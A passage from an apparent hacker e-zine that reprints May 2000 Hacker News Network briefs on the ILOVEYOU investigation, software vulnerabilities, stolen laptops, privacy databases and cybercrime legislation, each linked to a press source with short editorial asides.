Center http://www.govexec.com/dailyfed/0500/050900b1.htm http://www.ecommercetimes.com/news/articles2000/000509-3.shtml https://www.ifccfbi.gov/ @HWA 16.0 [HNN] May 10'00 And Yet Another Hole Found In Hotmail ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Apocalypse Dow If a Hotmail user clicks on an attachment that contains a Javascript Trojan horse, an attacker can read, send, and delete messages from that person's account. Microsoft said that they would look into the issue a fix if needed. Wired http://www.wired.com/news/technology/0,1282,36241,00.html @HWA 17.0 [HNN] May 11'00 Solar Sunrise, Now on Video ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by yeza Solar Sunrise, the code name for what was once described as "the most organized and systematic attack the Pentagon has seen to date" is now out of video. A training tape produced by National Infrastructure Protection Center is now available for $12.28 from FilmComm. But read the review first. (Our tax dollars hard at work making videos of a couple of punk kids.) ZD Net - Scathing Solar Sunrise Review FilmComm http://www.zdnet.com/intweek/stories/columns/0,4164,2567361,00.html http://www.filmcomm.com @HWA 18.0 [HNN] May 11'00 Network Manager Sent to Jail For Destroying His Network ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by McIntyre In the first federal criminal prosecution of computer sabotage a network manager, who spent ten and a half years building the network, was found guilty of destroying what he had built. Tim Lloyd, 37, of Wilmington, Del. had deleted all the files that controlled the companies manufacturing process three weeks after he had been fired. Omega Engineering, a high-tech measurement and instrumentation manufacturer, has estimated that it lost more than $10 million. Mr. Lloyd could face at least five years in federal prison, sentencing has been scheduled for July 31. The Industry Standard http://www.thestandard.com/article/display/0,1151,14938,00.html @HWA 19.0 [HNN] May 11'00 Lawmakers Upset Over ILOVEYOU ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Kevin In a hearing on Wednesday the House Science Committee's panel on technology criticized the Anti-Virus industry for failing to protect the nation against the ILOVEYOU virus/worm. During the hearing Congressman Gutknecht said he was contemplating drafting a bill that would make it illegal for software companies to hire former hackers. Peter Tippett, chief scientist at Virginia-based computer security assurance firm ICSA.net went so far as to suggest that the mere act of writing a virus should be made illegal. (And so the hysteria begins.) Security Focus http://www.securityfocus.com/news/32 @HWA 20.0 [HNN] May 11'00 Intel Motherboards Could Destroy Files ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Code Kid Intel has admitted that nearly one million motherboards, that have shipped since November, may have a defective 'memory translator hub' that could experiences problems in transferring data between the SDRAM and the 820 Intel processor. Intel said that the defect could cause some systems to intermittently reset, reboot, hang or possibly cause data corruption. The motherboards have been shipped to numerous suppliers including Dell and Compaq as well as third party manufacturers. Intel has said it will replace the defective parts but urges customers to contact their dealer. Nando Times C|Net http://www.nandotimes.com/technology/story/body/0,1634,500202708-50028 0641-501498167-0,00.html http://news.cnet.com/news/0-1006-201-1851632-0.html?tag @HWA 21.0 [HNN] May 11'00 Hackers and the Tools They Use ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Crypt0pimP So what should you get out of your $150,000 penetration test? Someone fresh out of school who knows how to run ISS and that is it? Or should you be getting a more thorough test of your network? SunWorld http://www.sunworld.com/sunworldonline/swol-05-2000/swol-05-security.h tml @HWA 22.0 [HNN] May 11'00 HackerNews Brazil and SecureNet Forced To Remove Content ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by no The web site http://www.hackernews.com.br and Secure Net, also based in Brazil, have been forced to remove their defaced page archives. Brazil's legal system decided that the defacement mirror archives hosted on the sites were a incentive to criminal activity and forced them to be removed. Terra - Portuguese The web site http://www.hackernews.com.br and Secure Net, also based in http://www.terra.com.br/informatica/2000/05/09/021.htm @HWA 23.0 [HNN] May 12'00 ILOVEYOU May Have Been An Accident ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench A Philippino computer student has admitted that he may have been the one who released the ILOVEYOU virus/worm but that it was an accident. However, he would not admit to writing the virus. Investigators have said they want to talk with with Onel A. de Guzman but declined to identify him as a suspect. Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500203055-50028 1301-501504037-0,00.html @HWA 24.0 [HNN] May 12'00 Windows Labeled 'Virus Friendly' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles Experts are criticizing Microsoft for making software that has features that few people want or need but that make it extremely easy for viruses to spread. Windows Scripting Host and Visual Basic are two of the features named that come standard with every installation that assist if not promote the spread of malicious code. The Industry Standard http://www.thestandard.com/article/article_print/1,1153,15019,00.html @HWA 25.0 [HNN] May 12'00 PBS Looses Subscriber Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by sean.o The Public Broadcasting System based in Lewiston Maine, suffered an electronic intrusion into its billing system. Officials have said that they do not now if any of the personal information, including names, phone numbers, addresses and credit card numbers of it's 63,000 radio and television members had even been looked at let alone copied and downloaded. The station said that it is warning its members just in case. Associated Press - San Jose Mercury News http://www.sjmercury.com/svtech/news/breaking/ap/docs/58851l.htm @HWA 26.0 [HNN] May 12'00 Anonymous User Sues Yahoo For Releasing Identity ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Space Rogue After having his identity revealed to AnswerThink Consulting an anonymous user is suing Yahoo for not notifying him that his identity had been revealed. The civil suit charges Yahoo, Inc., with invasion of privacy, breach of contract, negligent misrepresentation, and unfair competition and false advertising. Yahoo revealed the names of several posters to an AnswerThink message board after being subpoenaed. The user, known as 'Aquacool_2000' is being supported by ACLU and EPIC. ZD Net http://www.zdnet.com/zdnn/stories/news/0,4586,2567806,00.html @HWA 27.0 [HNN] May 12'00 Smart Cards Labeled Secure ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench On May 5th the National Institute of Standards and Technology issued a (FIPS) Pub 140-1 certification to the Spyrus'9 Rosetta Smart Card. This is the first smart card to receive such certification. The certification makes this card eligible to participate in the GSAs $1 Billion government wide smart card contract. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0508/web-fips-05-11-00.asp @HWA 28.0 [HNN] May 12'00 Cyber Attackers on Television ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by PhantasmP This Saturday (May 13th) America's Most wanted is airing an episode about cyber terrorism. The write up in the print edition of TV Guide is as follows: "Examining U.S. government efforts to stop criminal computer hackers, who can disrupt vital city services." The online edition says "Cyber-Criminals Special Edition: An overview of cyber terrorism includes easy targets; wide-ranging effects; and a profile of a dangerous hacker." The show is scheduled to air at 9pm EST on FOX Networks. (Like this won't be full of FUD.) TV Guide America's Most Wanted http://www.tvguide.com/listings/index.asp?view http://www.amw.com/site/thisweek/index.html @HWA 29.0 [HNN] May 15'00 Love Bug Suspect Denies All ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Brian Michael Buen, who has been suspected of writing the ILOVEYOU virus/worm has denied all involvement. "I should like to categorically state for the record that I have no involvement or participation whatsoever in the design, development, creation or dissemination of the `'ILOVEYOU' virus," Buen said in a statement. Associated Press - San Jose Mercury News ZD Net http://www.mercurycenter.com/svtech/news/breaking/ap/docs/67301l.htm http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2569390,00.html?ch kpt @HWA 30.0 [HNN] May 15'00 Microsoft Found to Be Threat to National Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Cult hero A two part essay that explains why Microsoft is bad for the country has been posted. The first part focuses on the serious security shortcomings of Windows while part 2 focuses on the laws the software industry has passed to protect themselves from any liability. InfoWarrior Microsoft Criticism Mounts After Melissa Microsoft had over a year to address security concerns about the tight integration of its email client with other parts of its operating system. Now system administrators are criticizing the company for letting the problem grow out of hand instead of attempting to minimize the potential threat. ZD Net http://www.infowarrior.org/articles.html http://www.zdnet.com/zdnn/stories/news/0,4586,2568904,00.html @HWA 31.0 [HNN] May 15'00 G8 to Discuss Cybercrime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by evenprime The Group of Eight (G8) will meet in Paris today for a three day discussion about the increasing threat of online crime. ZD Net APB Online BBC http://www.zdnet.com/zdnn/stories/newsbursts/0,7407,2569395,00.html?ch kpt http://www.apbnews.com/newscenter/internetcrime/2000/05/14/netcrime051 4_01.html http://news.bbc.co.uk/hi/english/world/europe/newsid_748000/748597.stm @HWA 32.0 [HNN] May 15'00 VA Described as Wide Open To Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench An internal memo circulating within the Veterans Administration has listed 18 different vulnerabilities in computer systems at the organization. VA computer security is said to be so weak that it continues to be a target for attack. The VA spends $1 Billion of taxpayers money per year on computer systems. Federal Computer Week http://www.fcw.com/fcw/articles/2000/0508/web-va-05-12-00.asp @HWA 33.0 [HNN] May 15'00 Bank Web Site Breached ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by weknowu The web site of the Saraswat co-operative bank in India was breached by a group of attackers who claimed they where testing its security. The attackers gained access to customer account information but where unable to initiate any online transactions. Bank officials have said that they have closed the security hole. Times Of India http://www.timesofindia.com/120500/12mpun3.htm @HWA 34.0 [HNN] May 15'00 Koreans Host 'Hacking Contest' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench The Korea Advanced Institute of Science and Technology (KAIST) will hold an international hacking contest from June 27 to the 30th. A prize of $50,000 will be awarded for the top finisher, and $20,000 and $10,000 to the second- and third-place finishers, respectively. (Another lame attempt at publicity, these contests do nothing to test security or gain information.) Korea Herald Korea Advanced Institute of Science and Technology http://www.koreaherald.co.kr/news/2000/05/__10/20000515_1023.htm http://www.kaist.ac.kr/edex.html @HWA 35.0 [HNN] May 15'00 America's Most Wanted Hit with DoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by sleestack After lumping hackers in with murders and serial rapists the web site for America's Most Wanted became unreachable. Experts theorize that the site came under a heavy denial of service attack after airing a segment on cyber-crime which asked users to phone in tips on the recent attacks that hit Yahoo, CNN, and others. Security Focus America's Most Wanted http://www.securityfocus.com/news/34 http://www.amw.com @HWA 36.0 [HNN] May 15'00 Greisling Responds ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by David Chicago Tribune columnist David Greising published a scathing article on hackers last week that said we should all be locked up as criminals. This week he responds in a slightly calmer tone. (At least he substituted the word cybervandel once in this weeks column. Not much but a start.) Hackers Hardly Huggable; Let's Get Serious - May 7 Hackers weigh in, and are they ... uh ... hacked off - May 14 Mr. Greising included some carefully shosen statements out of the emails that he received for his article. HNN received a few of those same emails which we publish here in their entirety. Letters to David Greising http://www.chicagotribune.com/business/columnists/greising/0,1122,SAV- 0005070041,00.html http://chicagotribune.com/business/columnists/greising/ @HWA 37.0 [HNN] May 17'00 Microsoft Security Spanked Again ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by turtlex Microsoft Office 2000 ships with an ActiveX control named "Microsoft Office UA Control". Most users probably recognize it as the sickening friendly little paper clip character that makes annoying noises and faces at you while you work. It is installed by default and is categorized as being "safe for scripting" which could allow an attacker to write a script that would allow them to do anything on the victims computer including deleting files. ZD Net Fairfax IT @stake L0pht Labs - Advisory Microsoft - Patch http://www.zdnet.com/zdnn/stories/news/0,4586,2570727,00.html http://www.it.fairfax.com.au/breaking/20000515/A62291-2000May15.html http://www.l0pht.com/advisories/msoua.txt http://www.microsoft.com/technet/security/bulletin/ms00-034.asp @HWA 38.0 [HNN] May 17'00 Canada's Big Brother Revealed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by pyr8 Canada's federal Privacy Commissioner, Bruce Phillips, has revealed a massive computerized database that contains volumes of personal data on 33.7 million Canadian's living and dead. The database was started fifteen years ago by the Office of Employment and Immigration and is used to research and evaluate the effectiveness of the federal employment insurance program. The database contains information regarding tax returns, child tax benefits, provincial and municipal welfare files, federal jobs, job training and other information. There are proposals to expand the database to include additional data on social assistance recipients from provinces and territories, the Canada Student Loan Program, the Canada Pension Plan and Old Age Security Program. Ottawa Citizen http://www.ottawacitizen.com/national/000517/4116449.html @HWA 39.0 [HNN] May 17'00 Code on Disk Points Finger At Suspect ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench A disk taken from the home of Onel A. de Guzman contains a copy of a different virus that bears a striking resemblance to the ILOVEYOU virus/worm. According to the National Bureau of Investigation this new virus was written by Michael Buen. Mr. Buen has denied any and all involvement in the case. Associated Press - via Yahoo http://dailynews.yahoo.com/h/ap/20000516/tc/computer_love_bug_74.html @HWA 40.0 [HNN] May 17'00 List of ILOVEYOU Suspects Grows ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench Authorities are now looking at over 40 people as possible authors of the recent ILOVEYOU virus/worm. Most of the suspects are students at Manila's Amable Mendoza Aguiluz Computer College. Industry Standard - via Yahoo http://dailynews.yahoo.com/h/is/20000516/bs/list_of_love_bug_suspects_ grows_1.html @HWA 41.0 [HNN] May 17'00 Return of the Phreaker ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles This article uses a few scare tactics but obviously when connecting telephone and network systems together it is imperative to ensure that adequate security controls are in place. Some experts theorize that soon Phreakers will need to penetrate the Internet to access phone systems. A complete reversal of roles when it was the computer underground that needed access to the phone systems to access computers. Wired http://www.wired.com/news/business/0,1367,36309,00.html @HWA 42.0 [HNN] May 17'00 Hope 2000 Announces Plans ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Macki HOPE 2000 has announced a mock DeCSS trial and that they are currently recruiting DJs and bands. They will soon announce the speaker list. In an interesting side development the real DeCSS trial date has been moved to the Monday after h2k. HOPE 2000 http://www.h2k.net/ @HWA 43.0 [HNN] May 17'00 More and more E-zines ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Kynik Issue 5 of the Napalm e-zine has been released, covering contemporary telenet, ethernet, music reviews, and various reader questions and comments. Fobidden Knowledge has released FK-11. Napalm Forbidden Knowledge - Official Distribution Site http://napalm.firest0rm.org/ http://www.effkay.za.net @HWA 44.0 [HNN] May 18'00 UCITA May Help Computer Attackers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles The Uniform Computer Information Transactions Act (UCITA) has been accused of giving computer attackers backdoor access into computer systems. The law allows software manufacturers to install backdoors into the software so that they can control licensing agreements. Experts fear that these backdoors will be exploited by criminals who are looking to cause havoc. BBC http://news.bbc.co.uk/hi/english/sci/tech/newsid_752000/752180.stm @HWA 45.0 [HNN] May 18'00 H.R.3489 To Limit Eavesdropping ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by evenprime The House Commerce Committee has voted to make it a crime to sell anything that can decode PCS cellular, pager traffic, or encrypted radio transmissions for the purposes of unauthorized interception. The ban was quietly attached to a tax harmonization bill as an amendment to the Communications Act of 1934. The bill, known as the Wireless Telecommunications Sourcing and Privacy Act, is expected to go before the Senate soon. (Instead of fixing the protcol lets just make it illegal.) Wired H.R.3489 http://www.wired.com/news/politics/0,1283,36401,00.html http://thomas.loc.gov/cgi-bin/bdquery/z?d106:h.r.03489: @HWA 46.0 [HNN] May 18'00 Congressional Records Reveals Officers Social Security Numbers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Arik Using public information found on military web sites a New Jersey man has admitted that he created fake credit card accounts for some of the nations highest-ranking military officers. Lamar Christian, of Trenton, N.J., said he got the information including social security numbers from a web site. The owner of the web site says he got them from the Congressional Record where the numbers used to be published when an officer was promoted. Christian is scheduled to be sentenced on August third and could face up to four years in jail. Associated Press - via ABC News http://abcnews.go.com/wire/US/ap20000517_684.html @HWA 47.0 [HNN] May 18'00 G8 Finds No Quick Fix For Cyber Crime ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by root66 While meeting in Paris, the worlds industrialized countries said they wanted faster and more specialized responses to online crime but at the same time did not want to hurt online economic growth. The group stressed cooperation, not only between countries but between government, law enforcement, and corporations. They plan to meet again on the topic in July. Reuters - via Wired Associated Press - via USA Today Industry Standard - via Yahoo http://www.wired.com/news/politics/0,1283,36398,00.html http://www.usatoday.com/life/cyber/tech/cth930.htm http://dailynews.yahoo.com/h/is/20000517/bs/group_unveils_net-security _recommendations_1.html @HWA 48.0 [HNN] May 18'00 Philippines Has No CyberCrime Law - Suspect Can Not be Prosecuted ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by root66 A senior Department of Justice official has said that the access control device law will not apply in the ILOVEYOU virus/worm case. This severely hampers the investigation and it is unknown what direction it will take next. (If no crime has been committed then why are they wasting resources looking for the perpetrator?) Associated Press - via Yahoo http://dailynews.yahoo.com/h/ap/20000517/tc/computer_love_bug_76.html @HWA 49.0 [HNN] May 18'00 Multiple Holes Found in Kerberos ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench The Computer Emergency Response Team at Carnegie Mellon has issued an advisory warning users of several buffer overflow conditions that exists in the Kerberos authentication system. These holes could allow an intruder root access to a system and effect both versions 4 and 5. CERT http://www.cert.org/advisories/CA-2000-06.html @HWA 50.0 [HNN] May 18'00 Interview with OpenBSD Creator ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles An interview with the creator OpenBSD, the only operating system that is constantly scoured for security flaws, has been posted to Upside. Theo de Raadt, the open source projects leader, has some interesting things to say about his project and the world around him. Upside Open BSD http://www.upside.com/Open_Season/3921a9080.html http://www.openbsd.org @HWA 51.0 [HNN] May 18'00 RIAA Looking For Targets ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Troy The RIAA has filed a lawsuit against SuperPimp Software, a small share ware developer of news reading software. No they aren't infringing on copyrights themselves, they just happen to produce software that could potentially be used to infringe on others copyrights. The issue is the article attachment decoder which could be used to decode copyrighted mp3s found in news groups. (Glad someone is fighting them.) Super Pimp Software http://www.superpimp.org @HWA 52.0 [HNN] May 18'00 Canadian BB DB Clippings ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Adam Yesterday we reported on the massive database Canada keeps on it citizens that was recently discovered. Today government officials are trying to minimize the damage. Global Mail "Human Resources Minister Jane Stewart said she saw nothing wrong with collecting vast amounts of information on Canadians in centralized databanks, noting that it has been done since 1985." National Post "Anne McLellan, the Justice Minister, yesterday said her officials will review outdated federal privacy legislation after a respected watchdog revealed that the government has created a computer database that puts the privacy of millions of Canadians at risk." "Ms. Stewart said the information in the computer database is safe because it is "encrypted," but then told the Commons that six unidentified HRDC employees have access to unencrypted information in the database." Toronto News Ottawa News http://www.globeandmail.com/gam/National/20000517/UPRIVN.html http://www.nationalpost.com/news.asp?f http://www.canoe.ca/TorontoNews/ts.ts-05-18-0015.html http://www.canoe.ca/OttawaNews/OS.OS-05-17-0008.html @HWA 53.0 [HNN] May 19'00 NewLove - Dangerous Variant on the Loose ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by altomo One of the over 40 variants of ILOVEYOU has the potential to be a serious threat to computer users. The 'New Love' worm is still sent as an attachment that a user must click on but now it now deletes all files on a hard drive and mapped network drives. In addition it randomly alters itself making it polymorphic and harder to defend against. The worm was first discovered in Israel and is thought to have come from someplace in Europe. So far it has infected only a few systems in Europe and California. All of the major anti-virus companies have added 'New Love' to their definition files. Associated Press - via Yahoo ZD Net ABC C|Net Symantec F-Secure McAfee Sophos http://dailynews.yahoo.com/h/ap/20000519/tc/new_love_bug_4.html http://www.zdnet.com/zdnn/stories/news/0,4586,2572454,00.html http://abcnews.go.com/sections/tech/dailynews/virus000519.html http://news.cnet.com/news/0-1005-200-1899852.html?tag http://www.symantec.com http://www.f-secure.com http://www.mcafee.com http://www.sophos.com @HWA 54.0 [HNN] May 19'00 Old CIA Head Warns of Spy-Viruses ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by aleph1 Former CIA director R. James Woolsey has warned that new threats will come in the form of 'instructive' viruses as opposed to destructive. Unlike Melissa, ILOVEYOU, CIH, and others this new breed of viruses would use covert techniques to gather sensitive data and return it to international spies and terrorists Security Focus http://www.securityfocus.com/news/38 @HWA 55.0 [HNN] May 19'00 Fed Slow In Virus Reaction ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles Experts in government information systems told members of the General Accounting Office that the government was slow in reacting to ILOVEYOU. he said that government agencies where not given enough time to respond to the crisis which resulted in substantial damage to government systems and information. Associated Press - via Excite http://news.excite.com/news/ap/000518/16/love-bug-impact @HWA 56.0 [HNN] May 19'00 FCC's Attempted Expansion of CALEA In Court ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by JavaJ The U.S. Court of Appeals in Washington is hearing arguments over the rules issued last year by the Federal Communication Commission detailing how telecommunications companies must comply with the Communications Assistance for Law Enforcement Act (CALEA), passed by Congress in 1994. The FCC mandated that telephone lines must be compatible with surveillance equipment, traceable cell phones with post dialing digits (account numbers, voice mail passwords, etc.), and tappable packet-mode communications or Internet traffic. The FCC mandated that all of this information would be turned over simply for the asking with no warrant involved. The Center for Democracy and Technology is arguing that the FCC overstepped its bounds and that the FCC rules are in fact unconstitutional. MSNBC - via ZD Net Center For Democracy and Technology http://www.zdnet.com/zdnn/stories/news/0,4586,2570897,00.html?chkpt http://www.cdt.org/ @HWA 57.0 [HNN] May 19'00 Russian Computer Crime on the Rise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles Vitaly Degterev, first deputy chief of the Interior Ministry's department on high-tech crimes was quoted by the ITAR-TAS news agency as saying that there was more Russian cyber crime in the first three months of 2000 than in all of of 1999. From January to March of 2000 over 200 cases of computer attacks had been reported, in all of 1999 there were only 80 cases. Associated Press http://cnn.com/2000/TECH/computing/05/17/russia.hackers.ap/index.html @HWA 58.0 [HNN] May 19'00 J0n Pleads Guilty in Canada ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by root66 A teenager from Canada, known online as J0n, has pleaded guilty to charges in a Montreal court of defacing a NASA web page and of penetrating the systems of several Canadian and foreign institutions including Harvard and MIT. Following the surprise plea the judge served the maximum sentence of 240 hours of community work plus one year's probation, restricted use of a computer, and ordered the defendant to deliver a speech at a local high school court on the evils of hacking. NewsBytes - via USA Today http://www.usatoday.com/life/cyber/nb/nb3.htm @HWA 59.0 [HNN] May 19'00 Electronically Attacking a Bank ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Sangfroid Think your local neighborhood bank is safe from cyber attack? Think again. David H. Freedman has published a step by step guide of one way to break into a bank and siphon off 10 to 100 million bucks. Do you work at a bank? Better read this. Forbes http://www.forbes.com/asap/00/0403/056.htm @HWA 60.0 [HNN] May 22'00 NAI Removes NetBus Pro from Scanner ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Judd NetBus Pro 2.10, a remote administration tool by UltraAccess.net, has been removed from the McAffee Virus Scan software by Network Associates. NAI's change in attitude toward NetBus Pro 2.10 was not the result of back room negotiations, but rather upon the advice of McAfee's own legal counsel. Upon learning this, UltraAccess has been in communication with several other AV vendors, who also have agreed to remove detection of NetBus Pro. Information will be released as it develops. UltraAccess.net http://www.netbuspro.com @HWA 61.0 [HNN] May 22'00 Brits Lose Another Laptop ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles A British Intelligence officer had his laptop stolen after he put it down at a London railway station. Officials say that the laptop did not contain classified information but unconfirmed reports indicate that it did have specifications for the next generation of fighter aircraft and details of how they can be controlled from the ground. This is the second laptop stolen from Paddington Station in as many months and follows several other recent thefts. The Times UK http://www.the-times.co.uk/news/pages/sti/2000/05/21/stinwenws01039.ht ml @HWA 62.0 [HNN] May 22'00 State Department Audits Missing Laptops ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles The State Department has discovered that 15 of its 1,913 unclassified laptops have been either stolen or misplaced in the last 18 months. The survey conducted by the department's Bureau of Diplomatic Security only found only one missing classified laptop out of 60. Washington Post http://washingtonpost.com/wp-dyn/articles/A23562-2000May17.html @HWA 63.0 [HNN] May 22'00 Researchers Develop New Breed of Security Tool ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench This press release is a little short on the technical details but it would appear that researchers at the Department of Energy's Sandia National Laboratories has built a Hueristic Distributed Security Agent. The agent is supposedly able to match incoming threats against its fingerprint database but also learn and distinguish new threats on the fly. Researchers say that an initial release to sensitive government systems will happen within a year and to the civilian market within three years. EurekAlert http://www.eurekalert.org/releases/snl-chs051800.html @HWA 64.0 [HNN] May 22'00 Original ILOVEYOU Author Surfaces in Australia ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by tall.drink The Australian that brought down the Australian Republican Movement's telecommunications system has told the media that it may have been himself who wrote the original worm upon which the world's latest email virus, ILOVEYOU, is based. Valiant wants to make it clear that someone else added the malicious payload. (Sorta seems like a publicity stunt to promote his company.) Sydney Morning Herald Wired http://www.smh.com.au/news/0005/22/pageone/pageone15.html http://www.wired.com/news/technology/0,1282,36477,00.html @HWA 65.0 [HNN] May 23'00 Secret Searches Reintroduced to Congress ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by JavaJ The Center for Democracy and Technology has sent out a warning regarding several bills currently before Congress that contain suspicious wording that could be interpreted to violate the Fourth Amendment. The language brings back the 'secret search' provisions of the Cyberspace Electronic Security Act that was tossed out after the draft was leaked to the press. Now secret searches are being reintroduced into several bills as small little noticed amendments. The time to act is now. CDT Warning Center for Democracy and Technology http://www.cdt.org @HWA 66.0 [HNN] May 23'00 FTC Wants Control Over Privacy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by Evil Wench The Federal Trade Commission has asked Congress for authority to regulate how companies use personal information collected on their Web sites. After concluding the industry failed to safeguard consumer privacy through self-regulation, the commission recommended that lawmakers pass legislation to bolster its ability to oversee online privacy. Nando Times ZD Net House Republicans think the FTCs move may be nothing more than election year politics. Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500207162-50028 9092-501566171-0,00.html http://www.zdnet.com/zdnn/stories/news/0,4586,2574082,00.html http://www.nandotimes.com/technology/story/body/0,1634,500206866-50028 8569-501560300-0,00.html @HWA 67.0 [HNN] May 23'00 Computer Attackers To get Even Higher Sentences ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by acopalyse At a conference on critical infrastructure protection Sens. John Kyl, R-Ariz., and Dianne Feinstein, D-Calif. announced that they are working on a bill to increase the sentences for computer attackers. The new bill would double the maximum jail term to ten years for convicted computer attackers. The legislation will probably be introduced later this week. (Increased jail time only costs the taxpayer money and does nothing to prevent other crimes or reform the perpetrator.) Newsbytes http://www.newsbytes.com/pubNews/00/149449.html @HWA 68.0 [HNN] May 23'00 Australia Loses Sensitive Laptops ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles Five laptops have turned up missing and are presumed stolen in what looks like an inside job at Australia's Parliament House. The laptops have been valued at $30,000 ($17,169 U.S.D.) and could allow intruders access to the parliamentary network. Australian IT http://australianit.com.au/common/storyPage/0,3811,715221%255E442,00.h tml @HWA 69.0 [HNN] May 23'00 Hong Kong to Create Cyber Response Team ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ contributed by William Knowles The Deputy Secretary for Information Technology and Broadcasting, Alan Siu Yu-bun, has said that an agreement has been reached in principle to create a Computer Emergency Response Team. It is hoped that the Team will not be a government agency but will instead form as a non-profit organization. Funding for the Team will hopefully come from the Information and Technology Fund. Hong Kong Standard http://online.hkstandard.com/today/default.asp?PageType @HWA 70.0 [HNN] May 23'00 South Africa Forms CyberCrime Unit 